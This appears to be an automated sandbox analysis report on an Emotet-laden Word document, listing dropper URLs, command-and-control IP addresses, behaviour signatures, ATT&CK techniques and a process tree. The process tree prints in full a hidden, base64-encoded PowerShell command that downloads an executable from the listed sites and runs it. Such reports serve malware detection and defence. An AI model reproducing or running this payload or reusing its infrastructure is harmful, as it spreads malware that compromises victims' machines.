Analysis

  • max time kernel
    142s
  • resource
    win10v191014
  • submitted
    11-12-2019 05:53

General

  • Target

    Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc

  • Sample

    191211-xf6bzaykg2

  • SHA256

    4ee0bf78e3b0a06c35fed0f912db6fabbb5fae13f838cd4132634359ad0d24da

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.prorites.com/wp-content/dsdb28de-kw0ch1msvi-003/

exe.dropper

https://www.silvesterinmailand.com/wp-content/uploads/ibvgux-yg4-03475/

exe.dropper

http://homemyland.net/tmp/wUHdeBS/

exe.dropper

https://www.celbra.com.br/old/wp-content/uploads/2019/mbwl6-lwu0psmcb-523/

exe.dropper

http://prihlaska.sagitta.cz/wp-content/uploads/WwcQXtRta/

Extracted

Family

emotet

C2

200.41.121.69:443

153.190.41.185:80

165.100.148.200:443

103.9.145.19:8080

46.105.128.215:8080

172.105.213.30:80

69.30.205.162:7080

172.104.70.207:8080

198.57.217.170:8080

103.122.75.218:80

212.112.113.235:80

113.52.135.33:7080

60.53.3.153:8080

1.32.54.12:8080

142.93.87.198:8080

91.117.31.181:80

45.129.121.222:443

186.215.101.106:80

143.95.101.72:8080

187.233.220.93:443

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Drops file in System32 directory 6 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Windows security modification 2 TTPs 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4984
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4060
    • C:\Windows\System32\SLUI.exe
      "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      2⤵
        PID:4476
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABCAHgAdQBoAGkAaABuAHIAdwBrAHoAbgBiAD0AJwBRAHIAYQBnAGkAcAB4AHcAZwAnADsAJABBAG4AdwBtAGkAdwBiAHUAegBoAHAAIAA9ACAAJwAyADEANgAnADsAJABUAHoAbgBsAG8AaQB5AGoAZgA9ACcASABzAHcAeQBkAGQAdwB5AGcAaQBzAGQAaAAnADsAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQQBuAHcAbQBpAHcAYgB1AHoAaABwACsAJwAuAGUAeABlACcAOwAkAEEAZwBkAGIAbgBjAHAAYQB0AHMAPQAnAEwAZQBkAGUAYwBsAHYAcwBvAGwAcgB0AHQAJwA7ACQAVwBuAGsAdgB4AHcAYgBhAD0AJgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBCAEMATABpAEUAbgBUADsAJABXAHoAagBsAGkAbABqAGMAZQA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHAAcgBvAHIAaQB0AGUAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGQAcwBkAGIAMgA4AGQAZQAtAGsAdwAwAGMAaAAxAG0AcwB2AGkALQAwADAAMwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwBpAGwAdgBlAHMAdABlAHIAaQBuAG0AYQBpAGwAYQBuAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AaQBiAHYAZwB1AHgALQB5AGcANAAtADAAMwA0ADcANQAvACoAaAB0AHQAcAA6AC8ALwBoAG8AbQBlAG0AeQBsAGEAbgBkAC4AbgBlAHQALwB0AG0AcAAvAHcAVQBIAGQAZQBCAFMALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGMAZQBsAGIAcgBhAC4AYwBvAG0ALgBiAHIALwBvAGwAZAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AMgAwADEAOQAvAG0AYgB3AGwANgAtAGwAdwB1ADAAcABzAG0AYwBiAC0ANQAyADMALwAqAGgAdAB0AHAAOgAvAC8AcAByAGkAaABsAGEAcwBrAGEALgBzAGEAZwBpAHQAdABhAC4AYwB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBXAHcAYwBRAFgAdABSAHQAYQAvACcALgAiAHMAcABgAGwAaQB0ACIAKAAnACoAJwApADsAJABNAHkAYgB3AGYAZQBmAGgAcgA9ACcAUgB0AHMAcwBkAGcAdQBlAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoAbABxAHYAcQBnAHMAZgB4AGoAYwByAGEAIABpAG4AIAAkAFcAegBqAGwAaQBsAGoAYwBlACkAewB0AHIAeQB7ACQAVwBuAGsAdgB4AHcAYgBhAC4AIgBEAG8AYABXAG4ATABgAE8AQQBkAEYAaQBsAEUAIgAoACQAWgBsAHEAdgBxAGcAcwBmAHgAagBjAHIAYQAsACAAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegApADsAJABEAHAAcgBtAG4AdQBvAHAAPQAnAEUAdgBjAGIAcwB2AGQAdABnACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQAuACIAbABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADcANgA2ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGEAYABSAHQAIgAoACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQA7ACQAWQB1AGIAYQB2AGkAbAB6AHAAeQBuAGsAdgA9ACcAVABxAGsAdABiAHcAeABtAHkAJwA7AGIAcgBlAGEAawA7ACQATABrAHIAawBlAHcAcQBlAHIAeABrAD0AJwBHAGUAawBzAGcAaQBzAGYAZwByAGoAZAB3ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAYgBoAGQAbABmAHcAYgBoAGUAPQAnAFUAcgB0AGgAaQBkAGwAbQB4AG0AZQAnAA==
      1⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:4708
      • C:\Users\Admin\216.exe
        "C:\Users\Admin\216.exe"
        2⤵
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        • Executes dropped EXE
        PID:4764
        • C:\Users\Admin\216.exe
          --7272c7d5
          3⤵
          • Suspicious behavior: EmotetMutantsSpam
          • Suspicious use of SetWindowsHookEx
          • Drops file in System32 directory
          • Executes dropped EXE
          PID:4420
    • C:\Windows\SysWOW64\defprint.exe
      "C:\Windows\SysWOW64\defprint.exe"
      1⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4104
      • C:\Windows\SysWOW64\defprint.exe
        --c67f8d9a
        2⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Executes dropped EXE
        PID:4152
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s BITS
      1⤵
      • Drops file in Windows directory
      PID:4216
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
      1⤵
        PID:4244
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
        1⤵
          PID:3388
        • \??\c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k unistacksvcgroup
          1⤵
            PID:4652
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
            1⤵
              PID:3608

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Defense Evasion

            Disabling Security Tools

            1
            T1089

            Modify Registry

            1
            T1112

            Discovery

            Query Registry

            3
            T1012

            System Information Discovery

            3
            T1082

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\216.exe
            • C:\Users\Admin\216.exe
            • C:\Users\Admin\216.exe
            • C:\Windows\SysWOW64\defprint.exe
            • C:\Windows\SysWOW64\defprint.exe
            • memory/4104-23-0x0000000000560000-0x0000000000577000-memory.dmp
              Filesize

              92KB

            • memory/4152-25-0x0000000000730000-0x0000000000747000-memory.dmp
              Filesize

              92KB

            • memory/4152-26-0x0000000000400000-0x0000000000492000-memory.dmp
              Filesize

              584KB

            • memory/4420-11-0x00000000021A0000-0x00000000021B7000-memory.dmp
              Filesize

              92KB

            • memory/4420-12-0x0000000000400000-0x0000000000492000-memory.dmp
              Filesize

              584KB

            • memory/4764-9-0x0000000002180000-0x0000000002197000-memory.dmp
              Filesize

              92KB

            • memory/4984-0-0x000001D9E9970000-0x000001D9E9971000-memory.dmp
              Filesize

              4KB

            • memory/4984-1-0x000001D9E4F41000-0x000001D9E4F46000-memory.dmp
              Filesize

              20KB